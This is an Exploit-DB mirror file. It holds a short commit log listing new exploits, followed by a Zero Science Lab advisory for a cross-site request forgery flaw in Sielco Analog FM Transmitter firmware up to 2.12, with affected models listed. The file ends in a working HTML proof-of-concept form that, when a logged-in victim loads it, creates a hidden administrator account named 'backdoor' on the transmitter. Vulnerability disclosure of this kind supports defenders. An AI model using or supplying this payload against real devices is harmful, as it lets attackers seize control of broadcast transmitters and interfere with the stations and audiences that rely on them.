exploit-db-mirror/exploits/hardware/webapps/51364.txt
Exploit-DB 2f07358143 DB: 2023-04-15
16 changes to exploits/shellcodes/ghdb

InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal

Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation
Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking
Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password
Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset
Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure

Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)

Bludit 4.0.0-rc-2 - Account takeover

Microsoft Windows 11 - 'cmd.exe' Denial of Service
2023-04-15 00:16:19 +00:00

80 lines
No EOL
2.7 KiB
Text

<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery
## Exploit Author: LiquidWorm
Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5757
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5757.php
26.01.2023
-->
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input type="hidden" name="pwd0" value="" />
<input type="hidden" name="pwd0bis" value="" />
<input type="hidden" name="user1" value="" />
<input type="hidden" name="pwd1" value="" />
<input type="hidden" name="pwd1bis" value="" />
<input type="hidden" name="auth1" value="" />
<input type="hidden" name="user2" value="" />
<input type="hidden" name="pwd2" value="" />
<input type="hidden" name="pwd2bis" value="" />
<input type="hidden" name="auth2" value="" />
<input type="hidden" name="user3" value="backdoor" />
<input type="hidden" name="pwd3" value="backdoor123" />
<input type="hidden" name="pwd3bis" value="backdoor123" />
<input type="hidden" name="auth3" value="2" />
<input type="submit" value="Adminize!" />
</form>
</body>
</html>